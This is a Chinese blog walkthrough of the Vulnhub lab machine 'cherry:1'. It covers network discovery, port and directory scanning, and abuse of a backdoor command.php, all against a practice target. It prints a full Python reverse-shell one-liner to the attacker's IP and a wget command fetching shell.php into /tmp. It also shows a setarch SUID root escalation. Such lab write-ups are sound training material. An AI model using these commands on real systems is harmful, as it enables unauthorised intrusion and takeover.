靶机渗透测试（cherry:1）

最新推荐文章于 2024-02-23 18:35:54 发布

@小张小张

最新推荐文章于 2024-02-23 18:35:54 发布

阅读量1k

点赞数

分类专栏：靶机渗透题解文章标签：靶机 linux 安全漏洞 shell

本文链接：https://blog.csdn.net/weixin_46700042/article/details/109265973

版权

靶机渗透题解专栏收录该内容

23 篇文章 3 订阅

订阅专栏

靶机渗透测试（cherry:1）：

Vulnhub靶机 cherry:1
靶机：修改靶机的网络配置为桥接模式。
攻击机：Kali虚拟机，同样使用桥接模式，即可访问靶机。
靶机难度：（Easy）
目标：Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

渗透流程：

1. 探测靶机ip地址（netdiscover -i eth0 -r 网关）

命令： netdiscover -i eth0 -r 192.168.10.0

探测出靶机ip为：192.168.10.51；
在这里插入图片描述

2. nmap进行靶机端口服务扫描

命令： nmap -sS -Pn -A -p- -n 192.168.10.51

靶机开放了22/ssh、 80/http、 7755/http、 33060/mysqlx？端口服务；

在这里插入图片描述

3. 根据端口服务进行渗透（80/ http端口服务）

3.1. web页面登陆

首先登陆80web页面，进行第一步信息收集，（哇哦，发现一颗樱桃！！）

在这里插入图片描述
继续一贯思路，查看源代码，发现一句敏感信息：“Hacked by XXX”，说明已经被植入了后门木马；

在这里插入图片描述

3.2. 目录扫描

使用御剑或者kali下的dirb工具对web页面进行目录扫描：

命令： dirb http://192.168.10.51:80
发现存在backup文件目录，以及info.php文件目录；

在这里插入图片描述

访问backup网页 > 403 Forbidden！！！

在这里插入图片描述
访问info.php网页 > 下载php文件，文件内容为phpinfo；

在这里插入图片描述

4. 7755/http端口服务渗透

4.1. 7755-web登陆

访问http://192.168.10.51:7755 ,发现主页面仍然和80页面相同，且源代码一模一样！！！

dirb目录扫描一波，仍然为相同的文件目录；

在这里插入图片描述
访问info.php页面 > 页面正常回显！！！

在这里插入图片描述
访问backup页面 > 页面回显index of backup ！！！
且存在command.php！！！

在这里插入图片描述

4.2. 点击进入command.php网页，查看源代码，发现命令执行漏洞；是一个可以执行系统命令的后门，只要传入参数backup，后面跟着系统命令，成功执行！！！

在这里插入图片描述
url执行?backup=ls -l可以看到页面正常回显ls -l命令结果；

在这里插入图片描述

5. 提权：

可以直接执行系统命令，尝试反弹shell

5.1. 方法一. 使用python反弹shell的方法

访问URL：http://192.168.10.51:7755/backup/command.php?backup=/usr/bin/python3.8%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.10.8%22,2345));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

ip指向kali攻击机，端口设置监听

反弹到shell，whoami查看当前用户，为www-data低权限用户；

在这里插入图片描述

5.2. 使用SUID提权

命令：
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
发现setarch命令，使用setarch进行提权;

命令：setarch $(arch) /bin/sh -p
成功提权到root，切换到root目录中，得到flag;

在这里插入图片描述

方法二 . 上传php文件反弹shell

当然我们也可以使用另外一种方法，如果url传参反弹shell失败。我们还可以在kali攻击机上部署简单web服务器，把我们的php文件拉入/var/www/html目录，使用wget命令下载到靶机/tmp目录下，访问木马路径，成功反弹shell！！！

命令： python -m SimpleHTTPServer 8080
部署简单web服务器
cp shell.php /var/www/html 复制shell脚本到www目录下；

Hackbar传参：
?backup=wget http://192.168.10.8/shell.php -O /tmp/shell.php

chmod 777 /tmp/shell.php
赋予shell.php文件执行权限

在这里插入图片描述

在这里插入图片描述
成功反弹shell！！！（提权过程仍然使用suid提权）

实验总结：

在此次靶机实验中，80端口与7755端口的web服务页面的相同路径与目录文件是新颖亮点，后面过程中利用到后门命令执行代码，可直接使用系统命令；以及使用shell.php文件反弹shell时，要记得使用chmod对文件赋予执行权限；

提权过程中使用常见的Suid提权，相对简单。
linux-SUID提权

@小张小张

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
靶机渗透测试（cherry:1）

靶机渗透测试（HA: NARAK）：Vulnhub靶机 HA: NARAK靶机：修改靶机的网络配置为桥接模式。攻击机：Kali虚拟机，同样使用桥接模式，即可访问靶机。靶机难度：（Intermediate–Hard）目标：Boot to Root .Your target is gain the Root access渗透流程：1. 探测靶机ip地址（netdiscover -i eth0 -r 网关）命令： netdiscover -i eth0 -r 192.168.10.
复制链接

扫一扫